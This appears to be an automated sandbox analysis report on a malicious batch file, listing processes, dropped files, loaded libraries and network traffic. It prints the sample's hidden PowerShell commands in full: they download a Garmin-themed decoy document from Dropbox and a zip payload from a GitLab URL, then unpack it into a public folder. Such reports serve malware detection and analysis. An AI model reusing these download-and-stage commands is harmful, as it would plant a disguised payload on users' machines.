                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.paypal.com/sdk/js
                Source: powershell.exe, 0000000E.00000002.3250200851.000002C70E224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.recaptcha.net/
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 65363 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 65363
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownHTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.5:65363 version: TLS 1.2

                System Summary

                barindex
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\tcl\reg1.3\tclreg13.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\pip3.12.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\wsdump.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\tcl\nmake\x86_64-w64-mingw32-nmakehlp.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\tcl\dde1.4\tcldde14.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\normalizer.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\pip3.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Scripts\pip.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF848F10E8514_2_00007FF848F10E85
                Source: classification engineClassification label: mal92.troj.evad.winBAT@28/61@3/2
                Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\tmpJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4052:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ggp3eb2g.zqf.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\garsukhjdf11.bat" "
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\chcp.comKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\garsukhjdf11.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\Desktop\garsukhjdf11.bat"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\Desktop\garsukhjdf11.bat"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\Desktop\garsukhjdf11.bat"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\Desktop\garsukhjdf11.bat"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx'"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/stare2/garmin/-/raw/main/fuknew1112.zip', 'C:\Users\Public\Document.zip')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\Desktop\garsukhjdf11.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\Desktop\garsukhjdf11.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\Desktop\garsukhjdf11.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\Desktop\garsukhjdf11.bat"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx'"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/stare2/garmin/-/raw/main/fuknew1112.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: Binary string: \??\C:\Windows\System.Core.pdbX source: powershell.exe, 0000000C.00000002.2168861605.0000028C26756000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Management.Automation.pdbFg source: powershell.exe, 0000000C.00000002.2169790015.0000028C26991000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\Vinay\Projects\simple_launcher\dist\t64.pdb source: powershell.exe, 00000011.00000002.3326115686.0000022300F38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3326115686.00000223015CC000.00000004.00000800.00020000.00000000.sdmp, pip3.12.exe.17.dr
                Source: Binary string: @$(CPY) "$(OUT_DIR)\*.pdb" "$(LIB_INSTALL_DIR)\" source: powershell.exe, 00000011.00000002.3326115686.000002230169A000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.2168861605.0000028C266EF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 0000000C.00000002.2169790015.0000028C269A9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Core.pdb source: powershell.exe, 0000000C.00000002.2169790015.0000028C26991000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.2168861605.0000028C26769000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Windows\System.pdbpdbtem.pdbB source: powershell.exe, 0000000C.00000002.2168861605.0000028C26756000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbO source: powershell.exe, 0000000C.00000002.2168861605.0000028C266EF000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: *.pdbz source: powershell.exe, 0000000C.00000002.2153558722.0000028C0C76B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.pdb source: powershell.exe, 0000000C.00000002.2169790015.0000028C26991000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbH source: powershell.exe, 0000000C.00000002.2169790015.0000028C26960000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Source: Yara matchFile source: garsukhjdf11.bat, type: SAMPLE
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx'"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/stare2/garmin/-/raw/main/fuknew1112.zip', 'C:\Users\Public\Document.zip')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
